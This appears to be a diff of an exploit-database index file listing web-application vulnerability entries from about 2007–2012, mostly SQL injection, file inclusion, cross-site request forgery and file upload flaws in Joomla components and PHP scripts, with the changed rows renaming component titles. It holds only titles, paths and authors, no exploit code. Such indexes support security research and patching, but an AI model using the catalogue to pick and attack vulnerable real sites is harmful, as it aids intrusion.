14211,platforms/php/webapps/14211.txt,"Joomla! Component NinjaMonials - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0
14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection",2010-07-05,"ADEO Security",php,webapps,0
14250,platforms/php/webapps/14250.txt,"Joomla! Component 'com_neorecruit' - 'Itemid' Parameter Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14250,platforms/php/webapps/14250.txt,"Joomla! Component NeoRecruit 1.6.4 - 'Itemid' Parameter Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14223,platforms/php/webapps/14223.txt,"Bs Scripts_Directory - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
14224,platforms/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
14225,platforms/php/webapps/14225.txt,"Bs Realtor_Web Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
@ -23731,8 +23736,8 @@ id,file,description,date,author,platform,type,port
14444,platforms/php/webapps/14444.txt,"ZeeNetworking 1x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0
14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0
14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0
14448,platforms/php/webapps/14448.txt,"Joomla! Component 'com_golfcourseguide' 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
14449,platforms/php/webapps/14449.txt,"Joomla! Component 'com_huruhelpdesk' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14448,platforms/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps,0
14449,platforms/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14450,platforms/php/webapps/14450.txt,"Joomla! Component 'com_iproperty' - SQL Injection",2010-07-23,Amine_92,php,webapps,0
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
@ -23744,7 +23749,7 @@ id,file,description,date,author,platform,type,port
14462,platforms/php/webapps/14462.txt,"Joomla! Component 'com_oziogallery' - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps,0
14463,platforms/php/webapps/14463.txt,"Joomla! Component 'com_itarmory' - SQL Injection",2010-07-24,Craw,php,webapps,0
14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection",2010-07-24,CoBRa_21,php,webapps,0
14466,platforms/php/webapps/14466.txt,"Joomla! Component 'com_joomdle' 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
14466,platforms/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps,0
14467,platforms/php/webapps/14467.txt,"Joomla! Component 'com_youtube' - SQL Injection",2010-07-24,Forza-Dz,php,webapps,0
14469,platforms/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps,0
14470,platforms/php/webapps/14470.txt,"Ballettin Forum - SQL Injection",2010-07-25,3v0,php,webapps,0
@ -23752,7 +23757,7 @@ id,file,description,date,author,platform,type,port
14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injection",2010-07-25,"Salvatore Fresta",php,webapps,0
14483,platforms/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,php,webapps,0
14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps,0
14476,platforms/php/webapps/14476.txt,"Joomla! Component 'com_Joomla-visites' - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0
14476,platforms/php/webapps/14476.txt,"Joomla! Component Visites 1.1 RC2 - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps,0
14481,platforms/php/webapps/14481.txt,"Joomla! Component 'com_ttvideo' 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps,0
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
14488,platforms/php/webapps/14488.txt,"Joomla! Component 'com_appointinator' 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
@ -23856,7 +23861,7 @@ id,file,description,date,author,platform,type,port
14839,platforms/php/webapps/14839.txt,"GuestBookPlus - HTML Injection / Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0
14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion",2010-08-30,"FoX HaCkEr",php,webapps,0
14845,platforms/php/webapps/14845.txt,"Joomla! Component 'com_picsell' - Local File Disclosure",2010-08-30,Craw,php,webapps,0
14846,platforms/php/webapps/14846.txt,"Joomla! Component 'com_jefaqpro' - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0
14846,platforms/php/webapps/14846.txt,"Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection",2010-08-31,"Chip d3 bi0s",php,webapps,0
14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0
14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0
14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0
@ -23871,7 +23876,7 @@ id,file,description,date,author,platform,type,port
14891,platforms/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",2010-09-04,"BorN To K!LL",php,webapps,0
14893,platforms/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",2010-09-04,alsa7r,php,webapps,0
14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - 'sources/search.php' SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0
14896,platforms/php/webapps/14896.txt,"Joomla! Component 'com_magazine' 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0
14896,platforms/php/webapps/14896.txt,"Joomla! Component iJoomla Magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0
14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,AmnPardaz,php,webapps,0
14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps,0
14901,platforms/php/webapps/14901.txt,"Joomla! Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0
@ -23879,7 +23884,7 @@ id,file,description,date,author,platform,type,port
14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0
14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0
14911,platforms/php/webapps/14911.sh,"Joomla! Component 'com_gantry' 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0
14911,platforms/php/webapps/14911.sh,"Joomla! Component Gantry 3.0.10 - Blind SQL Injection",2010-09-05,jdc,php,webapps,0
14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0
14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0
14915,platforms/php/webapps/14915.txt,"InterPhoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0
@ -23899,7 +23904,7 @@ id,file,description,date,author,platform,type,port
15443,platforms/php/webapps/15443.txt,"Joomla! Component 'com_forme' 1.0.5 - Multiple Vulnerabilities",2010-11-06,jdc,php,webapps,0
14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0
14962,platforms/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80
14964,platforms/php/webapps/14964.txt,"Joomla! Component 'com_jphone' - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
14964,platforms/php/webapps/14964.txt,"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps,0
14968,platforms/php/webapps/14968.txt,"symphony 2.0.7 - Multiple Vulnerabilities",2010-09-10,JosS,php,webapps,0
14969,platforms/asp/webapps/14969.txt,"ASP Nuke - SQL Injection",2010-09-11,Abysssec,asp,webapps,0
@ -23914,7 +23919,7 @@ id,file,description,date,author,platform,type,port
14995,platforms/php/webapps/14995.txt,"Joomla! Component 'com_mtree' 2.1.5 - Arbitrary File Upload",2010-09-13,jdc,php,webapps,0
14996,platforms/php/webapps/14996.txt,"Storyteller CMS - (var) Local File Inclusion",2010-09-13,"BorN To K!LL",php,webapps,0
14997,platforms/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",2010-09-13,KnocKout,php,webapps,0
14998,platforms/php/webapps/14998.txt,"Joomla! Component 'com_jgen' - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
14998,platforms/php/webapps/14998.txt,"Joomla! Component JGen 0.9.33 - SQL Injection",2010-09-14,**RoAd_KiLlEr**,php,webapps,0
14999,platforms/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",2010-09-14,Abysssec,asp,webapps,0
15004,platforms/php/webapps/15004.pl,"E-Xoopport - Samsara 3.1 (Sections Module) - Blind SQL Injection",2010-09-14,_mRkZ_,php,webapps,0
15006,platforms/php/webapps/15006.txt,"eNdonesia 8.4 - SQL Injection",2010-09-15,vYc0d,php,webapps,0
@ -23942,7 +23947,7 @@ id,file,description,date,author,platform,type,port
15080,platforms/php/webapps/15080.txt,"Skybluecanvas 1.1-r248 - Cross-Site Request Forgery",2010-09-22,Sweet,php,webapps,0
15082,platforms/php/webapps/15082.txt,"BSI Hotel Booking System Admin 1.4/2.0 - Login Bypass",2010-09-22,K-159,php,webapps,0
15084,platforms/php/webapps/15084.txt,"Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0
15085,platforms/php/webapps/15085.txt,"Joomla! Component 'com_ezautos' - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
15085,platforms/php/webapps/15085.txt,"Joomla! Component Joostina - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
15090,platforms/php/webapps/15090.txt,"WAnewsletter 2.1.2 - SQL Injection",2010-09-23,BrOx-Dz,php,webapps,0
15091,platforms/php/webapps/15091.txt,"GeekLog 1.3.8 (filemgmt) - SQL Injection",2010-09-23,Gamoscu,php,webapps,0
15092,platforms/php/webapps/15092.txt,"OvBB 0.16a - Multiple Local File Inclusion",2010-09-23,cOndemned,php,webapps,0
@ -23951,7 +23956,7 @@ id,file,description,date,author,platform,type,port
15114,platforms/php/webapps/15114.php,"ZenPhoto - Config Update / Command Execution",2010-09-26,Abysssec,php,webapps,0
15102,platforms/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery (Add Admin)",2010-09-24,"John Johnz",win_x86,webapps,80
15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0
15157,platforms/php/webapps/15157.txt,"Joomla! Component 'com_jeguestbook' 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
15157,platforms/php/webapps/15157.txt,"Joomla! Component JE Guestbook 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0
15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,php,webapps,0
15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara 3.1 (eCal Module) - Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps,0
@ -23976,7 +23981,7 @@ id,file,description,date,author,platform,type,port
15154,platforms/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' Parameter SQL Injection",2010-09-29,"BorN To K!LL",php,webapps,0
15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0
15162,platforms/php/webapps/15162.rb,"Joomla! Component 'com_jejob' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15163,platforms/php/webapps/15163.rb,"Joomla! Component 'com_jedirectory' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15163,platforms/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0
15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion",2010-10-01,LiquidWorm,php,webapps,0
@ -24006,7 +24011,7 @@ id,file,description,date,author,platform,type,port
15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0
15222,platforms/php/webapps/15222.txt,"Joomla! Component Community Builder Enhanced (CBE) 1.4.8/1.4.9/1.4.10 - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0
15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,php,webapps,0
15224,platforms/php/webapps/15224.txt,"Joomla! Component 'com_jscalendar' 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
15224,platforms/php/webapps/15224.txt,"Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0
39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
@ -24035,7 +24040,7 @@ id,file,description,date,author,platform,type,port
15608,platforms/php/webapps/15608.txt,"Free Simple Software - SQL Injection",2010-11-24,"Mark Stanislav",php,webapps,0
15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0
15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0
15610,platforms/php/webapps/15610.txt,"Joomla! Component 'com_jeajaxeventcalendar' - SQL Injection",2010-11-25,ALTBTA,php,webapps,0
15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-11-25,ALTBTA,php,webapps,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0
15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0
@ -24074,7 +24079,7 @@ id,file,description,date,author,platform,type,port
15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0
15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
15366,platforms/php/webapps/15366.txt,"Joomla! Component 'com_flipwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
15366,platforms/php/webapps/15366.txt,"Joomla! Component Pulse Infotech Flip Wall - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
15367,platforms/php/webapps/15367.txt,"Joomla! Component 'com_sponsorwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0
15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0
@ -24116,7 +24121,7 @@ id,file,description,date,author,platform,type,port
15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0
15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
15460,platforms/php/webapps/15460.txt,"Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
15466,platforms/php/webapps/15466.txt,"Joomla! Component 'com_jquarks4s' 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
15466,platforms/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0
15468,platforms/php/webapps/15468.txt,"Joomla! Component 'btg_oglas' - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
15469,platforms/php/webapps/15469.txt,"Joomla! Component 'com_markt' - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
@ -24130,8 +24135,8 @@ id,file,description,date,author,platform,type,port
15492,platforms/php/webapps/15492.php,"E-Xoopport 3.1 - eCal display.php (katid) SQL Injection",2010-11-11,"Vis Intelligendi",php,webapps,0
15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection",2010-11-12,Daikin,asp,webapps,0
15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0
15501,platforms/php/webapps/15501.txt,"Joomla! Component 'com_jsupport' - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
15502,platforms/php/webapps/15502.txt,"Joomla! Component 'com_jsupport' - SQL Injection",2010-11-12,Valentin,php,webapps,0
15501,platforms/php/webapps/15501.txt,"Joomla! Component JSupport 1.5.6 - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
15502,platforms/php/webapps/15502.txt,"Joomla! Component JSupport 1.5.6 - SQL Injection",2010-11-12,Valentin,php,webapps,0
15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0
@ -24172,7 +24177,7 @@ id,file,description,date,author,platform,type,port
15574,platforms/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0
15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,php,webapps,0
15578,platforms/php/webapps/15578.txt,"DVD Rental Software - SQL Injection",2010-11-19,JaMbA,php,webapps,0
15585,platforms/php/webapps/15585.txt,"Joomla! Component 'com_jimtawl' - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0
15585,platforms/php/webapps/15585.txt,"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0
16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,php,webapps,0
15588,platforms/php/webapps/15588.txt,"S_CMS 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0
15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - Cross-Site Scripting Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0
@ -24224,14 +24229,14 @@ id,file,description,date,author,platform,type,port
15688,platforms/asp/webapps/15688.txt,"HotWebScripts HotWeb Rentals - 'resorts.asp' SQL Injection",2010-12-05,R4dc0re,asp,webapps,0
15690,platforms/asp/webapps/15690.txt,"SOOP Portal 2.0 - Arbitrary File Upload",2010-12-05,Net.Edit0r,asp,webapps,0
15691,platforms/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion",2010-12-05,"Mark Stanislav",php,webapps,0
15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection / Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80
15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client-Side Code Injection / Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
15701,platforms/php/webapps/15701.txt,"MODx REvolution CMS 2.0.4-pl2 - Cross-Site Scripting (POST Injection)",2010-12-06,LiquidWorm,php,webapps,0
15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b - Arbitrary File Upload",2010-12-07,"Sun Army",asp,webapps,0
15744,platforms/cgi/webapps/15744.txt,"Gitweb 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80
15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",multiple,webapps,0
15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,php,webapps,0
15714,platforms/php/webapps/15714.txt,"Joomla! Component 'com_jeauto' 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
15714,platforms/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0
15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps,0
15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0
@ -24246,7 +24251,7 @@ id,file,description,date,author,platform,type,port
15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0
15743,platforms/php/webapps/15743.txt,"Blog:CMS 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0
15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps,0
15749,platforms/php/webapps/15749.txt,"Joomla! Component 'com_jradio' - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
15749,platforms/php/webapps/15749.txt,"Joomla! Component JRadio - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
15752,platforms/php/webapps/15752.txt,"Softbiz PHP Joke Site Software - Multiple SQL Injections",2010-12-17,v3n0m,php,webapps,0
15753,platforms/hardware/webapps/15753.html,"D-Link DIR-300 - Cross-Site Request Forgery (Change Admin Account Settings)",2010-12-17,outlaw.dll,hardware,webapps,0
15754,platforms/php/webapps/15754.txt,"Immo Makler Script - SQL Injection",2010-12-17,"Easy Laster",php,webapps,0
@ -24269,7 +24274,7 @@ id,file,description,date,author,platform,type,port
15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps,0
15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps,0
15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0
15791,platforms/php/webapps/15791.txt,"Joomla! Component 'com_jotloader' 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0
15791,platforms/php/webapps/15791.txt,"Joomla! Component JotLoader 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0
15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,php,webapps,0
15795,platforms/php/webapps/15795.txt,"S9Y Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,php,webapps,0
15797,platforms/php/webapps/15797.txt,"Hycus CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0
@ -25028,7 +25033,7 @@ id,file,description,date,author,platform,type,port
18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
18048,platforms/php/webapps/18048.txt,"Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
18050,platforms/php/webapps/18050.txt,"Joomla! Component 'com_hmcommunity' - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
18050,platforms/php/webapps/18050.txt,"Joomla! Component HM Community - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0
18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0
18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0
@ -25305,7 +25310,7 @@ id,file,description,date,author,platform,type,port
18722,platforms/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",cgi,webapps,0
18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Authenticated OS Command Injection (Metasploit)",2012-04-09,Metasploit,php,webapps,0
18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0
18728,platforms/php/webapps/18728.txt,"Joomla! Component 'com_estateagent' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
18728,platforms/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
18729,platforms/php/webapps/18729.txt,"Joomla! Component 'com_bearleague' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0
18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0
@ -30659,7 +30664,7 @@ id,file,description,date,author,platform,type,port
30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0
29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0
